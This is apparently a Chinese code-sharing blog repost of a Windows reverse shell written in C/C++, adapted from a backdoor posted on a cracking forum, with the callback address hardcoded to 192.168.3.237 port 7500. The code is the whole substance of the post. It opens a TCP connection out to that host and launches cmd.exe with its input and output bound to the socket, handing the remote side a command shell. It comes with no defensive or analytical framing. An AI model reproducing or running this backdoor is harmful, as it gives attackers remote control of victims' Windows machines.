生活随笔
收集整理的這篇文章主要介紹了
C/C++编写的反向SHELL
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
轉(zhuǎn)載來源:
https://www.nulled.to/topic/87972-custom-windows-reverse-shell-backdoor-written-in-c/
http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/
下面是我根據(jù)原文的修改,將命令行指定ip端口改為寫死。將原文多字節(jié)編碼改為Unicode編碼。
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")WSADATA wsaData;
SOCKET Winsock;
struct sockaddr_in hax;
char ip_addr[
16] =
"192.168.3.237";
char port[
6] =
"7500";
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
int main()
{WSAStartup(MAKEWORD(
2,
2), &wsaData);Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,
NULL, (
unsigned int)
NULL, (
unsigned int)
NULL);
struct hostent *host; host = gethostbyname(ip_addr);strcpy_s(ip_addr, inet_ntoa(*((
struct in_addr *)host->h_addr)));hax
.sin_family = AF_INET;hax
.sin_port = htons(atoi(port));hax
.sin_addr.s_addr = inet_addr(ip_addr);WSAConnect(Winsock, (SOCKADDR*)&hax,
sizeof(hax),
NULL,
NULL,
NULL,
NULL);memset(&ini_processo,
0,
sizeof(ini_processo));ini_processo
.cb =
sizeof(ini_processo);ini_processo
.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; ini_processo
.hStdInput = ini_processo
.hStdOutput = ini_processo
.hStdError = (HANDLE)Winsock;TCHAR cmd[
255] = TEXT(
"cmd.exe");CreateProcess(
NULL, cmd,
NULL,
NULL,
TRUE,
0,
NULL,
NULL, &ini_processo, &processo_info);
return 0;
}
《新程序員》:云原生和全面數(shù)字化實踐50位技術(shù)專家共同創(chuàng)作,文字、視頻、音頻交互閱讀
總結(jié)
以上是生活随笔為你收集整理的C/C++编写的反向SHELL的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。